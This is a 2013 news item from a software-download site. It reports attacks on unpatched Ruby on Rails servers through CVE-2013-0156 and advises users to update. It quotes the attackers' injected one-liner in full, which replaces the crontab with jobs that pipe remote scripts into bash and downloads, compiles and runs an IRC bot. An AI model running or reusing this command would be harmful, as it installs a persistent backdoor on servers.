Providing Free and Editor Tested Software Downloads
< HOME | TUTORIALS | GEEK-CADE| WEB TOOLS | YOUTUBE | NEWSLETTER | DEALS! | FORUMS | >

MajorGeeks.com - Get your Geek on.

Software Categories

All In One Tweaks
Android
Antivirus & Malware
Appearance
Back Up
Browsers
CD\DVD\Blu-Ray
Covert Ops
Drivers
Drives (SSD, HDD, USB)
Games
Graphics & Photos
Internet Tools
Linux Distros
MajorGeeks Windows Tweaks
Multimedia
Networking
Office & Productivity
System Tools

Other news

· How To and Tutorials
· Life Hacks and Reviews
· Way Off Base
· MajorGeeks Deals
· News
· Off Base
· Reviews

spread the word

· YouTube
· Facebook
· Instagram
· Twitter
· Pintrest
· RSS/XML Feeds
· News Blur
· Yahoo
· Symbaloo

about

· Top Freeware Picks
· Malware Removal
· Geektionary
· Useful Links
· About Us
· Copyright
· Privacy
· Terms of Service
· How to Uninstall

top downloads

1. GS Auto Clicker
2. Macrium Reflect FREE Edition
3. Smart Defrag
4. Sergei Strelec's WinPE
5. MusicBee
6. Microsoft Visual C++ 2015-2022 Redistributable Package
7. K-Lite Mega Codec Pack
8. Visual C++ Redistributable Runtimes AIO Repack
9. ImgBurn
10. Sergei Strelec's WinPE 64-Bit for Windows 10 and 11
More >>

top reads

Star 4 Ways To Check System Uptime in Windows 11

Star 6 Ways To Clear Clipboard History

Star How To Enable and Install the Built-In System Monitor (Sysmon)

Star Network Location - What Is It and How To Add It?

Star 4 Ways To Run a Manual Scan With Microsoft Defender

Star How To Easily Backup and Import Windows Defender Firewall Rules

Star How To Install and Restore WMIC in Windows 11

Star How To Bring Back the Classic File Explorer with Ribbon in Windows 11

Star How To Limit Max CPU Usage for Microsoft Defender Scans in Windows 11

Star Recently Opened Files - How To Hide or Show Them In Jump Lists, File Explorer, and Start Menu


MajorGeeks.Com » News » May 2013 » Ruby on Rails still vulnerable unless updated

Ruby on Rails still vulnerable unless updated


Posted by: Tim Tibbetts on 05/29/13 11:36 am [ comments Comments ]


Ruby on Rails, (ROR), has a hole in it that allows attackers to attempt to compromise servers. Successful intruders install a bot that waits for instructions on an IRC channel. On his blog, security expert Jeff Jarmoc reports that the criminals are trying to exploit one of the vulnerabilities described by CVE identifier 2013-0156.

The holes were closed back in January, but many servers on the net are probably still infected because they are running an obsolete version of Ruby.

Jarmoc says that the attackers attempt to inject the following commands:

crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget 88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget 88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

This injection causes the bot (K.C) to be downloaded, compiled and executed. Source code is also on Jarmoc's blog. "k" tries to contact an IRC server hosted at the cvv4you.ru domain and then joins the #rails channel on that IRC server. Jarmoc says that k can be instructed to download and execute arbitrary code. The IRC server has since become unavailable – at least on this address.

Evidence of the bot appears in the process list as "-bash". When launched, it also creates a file called /tmp/tan.pid to ensure only one instance of the bot is executed. Those who run a server with Ruby on Rails should always make sure to have the current RoR version installed. The current versions of Ruby on Rails are 3.2.13, 3.1.12 and 2.3.18.




Ruby on Rails still vulnerable unless updated




Comments
comments powered by Disqus

MajorGeeks.Com » News » May 2013 » Ruby on Rails still vulnerable unless updated

© 2000-2026 MajorGeeks.com
Powered by Contentteller® CMS System